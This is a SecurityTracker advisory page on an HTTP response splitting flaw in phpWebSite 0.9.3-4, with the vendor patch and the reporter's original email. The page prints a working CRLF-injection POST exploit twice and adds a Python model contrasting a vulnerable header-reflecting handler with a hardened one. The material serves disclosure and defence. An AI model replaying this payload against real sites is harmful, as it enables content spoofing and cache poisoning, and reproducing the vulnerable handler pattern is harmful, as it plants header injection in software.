phpWebSite Input Validation Flaws Let Remote Users Conduct HTTP Response Splitting Attacks
SecurityTracker Alert ID: 1012200
SecurityTracker URL: http://securitytracker.com/id?1012200
CVE Reference: GENERIC-MAP-NOMATCH
Date: Nov 12 2004
Impact: Modification of system information, Modification of user information
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
Version(s): 0.9.3-4
Description: A vulnerability was reported in phpWebSite. A remote user can conduct HTTP response splitting attacks.
Maestro reported that the 'index.php' script does not properly validate user-supplied input before placing it in an HTTP response header; the demonstration targets the 'block_username' parameter of the user module's login action. Because carriage-return and line-feed characters (URL-encoded as %0d%0a) are not stripped, a remote user can submit a specially crafted HTTP POST request that terminates the server's own headers early and appends a complete second HTTP response of the attacker's choosing, so the target server returns a split response. A remote user can exploit this to spoof content on the target server, attempt to poison any intermediate web caches, or conduct cross-site scripting attacks.
A demonstration exploit POST request is provided. The injected value closes the server's response with a 'Content-Length: 0' header and then supplies a second '200 Ok' response whose 31-byte body is the spoofed page; the stated Content-length of 218 matches the body shown:
POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive

module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>This site in 0wned</html>&password=foobar
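As an added example (not code from the advisory or from phpWebSite), the following Python models the attack end to end: it decodes the advisory's POST body the way the server's form handling would, feeds the username into a hypothetical handler that reflects it into a response header unchanged, and then parses the resulting bytes the way a naive client or intermediate cache would, showing that one response has become two. The header used (a Location header on a redirect) is an assumption; the advisory does not say which header phpWebSite reflected the username into. The hardened handler beside it is likewise illustrative and is not the vendor's patch. Note that PHP's header() function has itself refused values containing CR/LF since PHP 4.4.2 and 5.1.2; the 0.9.3 releases this advisory covers predate that protection, and application code that writes headers through other paths still needs the check.

```python
# Added example (not from the advisory or from phpWebSite): a model of the
# HTTP response splitting attack described in the advisory.
#
# Assumption (not stated on the page): the vulnerable handler copies the
# submitted username into a Location header of a redirect. The advisory does
# not say which response header phpWebSite reflected the value into.
from urllib.parse import parse_qs, quote

# Constructed input: the POST body from the advisory, still URL-encoded as the
# attacker sends it (%0d%0a is a CRLF pair once decoded). It is 218 bytes long,
# matching the Content-length the advisory's request declares.
EXPLOIT_BODY = (
    "module=user&norm_user_op=login&block_username="
    "%0d%0aContent-Length:%200%0d%0a%0d%0a"
    "HTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0a"
    "Content-Type:%20text/html%0d%0a%0d%0a"
    "<html>This site in 0wned</html>&password=foobar"
)


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body the way $_POST does:
    %0d%0a becomes a literal CRLF inside the field value."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def vulnerable_response(form):
    """Hypothetical unpatched handler: the username is concatenated into a
    response header with no CR/LF filtering, so the attacker's value can end
    the header block and start a second response."""
    user = form["block_username"]
    return (
        "HTTP/1.1 302 Found\r\n"
        "Location: /index.php?module=user&user=" + user + "\r\n"
        "Content-Type: text/html\r\n"
        "\r\n"
    ).encode("latin-1")


def hardened_response(form):
    """Illustrative fix: reject bare CR/LF outright, and percent-encode the
    value before it reaches a header so it can never carry a line break."""
    user = form["block_username"]
    if "\r" in user or "\n" in user:
        return b"HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return (
        "HTTP/1.1 302 Found\r\n"
        "Location: /index.php?module=user&user=" + quote(user, safe="") + "\r\n"
        "Content-Length: 0\r\n"
        "\r\n"
    ).encode("latin-1")


def split_responses(raw):
    """Parse a byte stream into HTTP/1.x response messages the way a naive
    client or cache does: status line, headers, then Content-Length bytes of
    body. Returns a list of (status_line, headers, body) tuples."""
    messages = []
    pos = 0
    while pos < len(raw):
        head_end = raw.find(b"\r\n\r\n", pos)
        if head_end == -1:
            break
        lines = raw[pos:head_end].decode("latin-1").split("\r\n")
        if not lines[0].startswith("HTTP/"):
            break  # leftover bytes that are not a status line: stop parsing
        headers = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        body_start = head_end + 4
        if "content-length" in headers:
            body_end = body_start + int(headers["content-length"])
        else:
            body_end = len(raw)  # no length given: body runs to end of stream
        messages.append((lines[0], headers, raw[body_start:body_end]))
        pos = body_end
    return messages


def demo():
    form = parse_form(EXPLOIT_BODY)
    for label, handler in (("vulnerable", vulnerable_response),
                           ("hardened", hardened_response)):
        msgs = split_responses(handler(form))
        print(f"{label}: {len(msgs)} response(s) on the wire")
        for status, _, body in msgs:
            print("   ", status, body)


if __name__ == "__main__":
    demo()
```

Run as a script, the vulnerable handler yields two messages: the server's own 302 with an empty body, followed by the attacker's "HTTP/1.1 200 Ok" carrying the 31-byte spoofed page, which is exactly what a cache would store against the next pipelined request. The hardened handler yields a single 400.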
Impact: A remote user can craft a request that, when followed by a target user, causes attacker-controlled content to be displayed as if it were served by the target site.
A remote user may also be able to poison any intermediate web caches with arbitrary content.
Solution: The vendor has issued the following patch for 0.9.3-2 or greater:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
md5sum: fcefda44a8d691c844593d815479a1ce
Vendor URL: http://phpwebsite.appstate.edu/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>
Message History:
None.
Source Message Contents
Date: Thu, 11 Nov 2004 14:55:35 -0500
From: "Maestro De-Seguridad" <maestrodeseguridad@lycos.com>
Subject: security hole (http response splitting) in phpwebsite
ADVISORY
Author: Maestro (me!)
Date: 11-NOV-04
Vendor: Appalachian State University (http://phpwebsite.appstate.edu/)
Product: phpWebSite 0.9.3-4
Product description (from vendor website):
phpWebSite provides a complete web site content management system. Web-based administration allows for easy maintenance of interactive, community-driven web sites.
phpWebSite's growing number of modules allow for easy site customization without the need for unwanted or unused features. Client output from phpWebSite is valid XHTML 1.0 and meets the W3C's Web Accessibility Initiative requirements.
phpWebSite is written in the PHP Programming Language, making it ideal for developers to write customized modules.
Problem: HTTP response splitting (web cache poisoning, XSS, yadayadayada) - http://www.packetstormsecurity.org/papers/general/whitepaper_httpresponse.pdf
Exploit:
POST /index.php HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-length: 218
Connection: Keep-Alive
module=user&norm_user_op=login&block_username=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20Ok%0d%0aContent-Length:%2031%0d%0aContent-Type:%20text/html%0d%0a%0d%0a{html}This site in 0wned{/html}&password=foobar
(replace curly braces with lessthan and greaterthan)
Vendor status: The vendor fixed this problem (11-NOV-04).
From the vendor security mailing list:
A security vulnerability was brought to our attention recently and we have posted a patch to resolve this issue. The patch can be downloaded from here:
http://phpwebsite.appstate.edu/downloads/security/phpwebsite-core-security-patch2.tar.gz
md5sum: fcefda44a8d691c844593d815479a1ce
This patch should only be applied to versions 0.9.3-2 or greater. All you need to do is untar the file in the base directory of your phpwebsite install.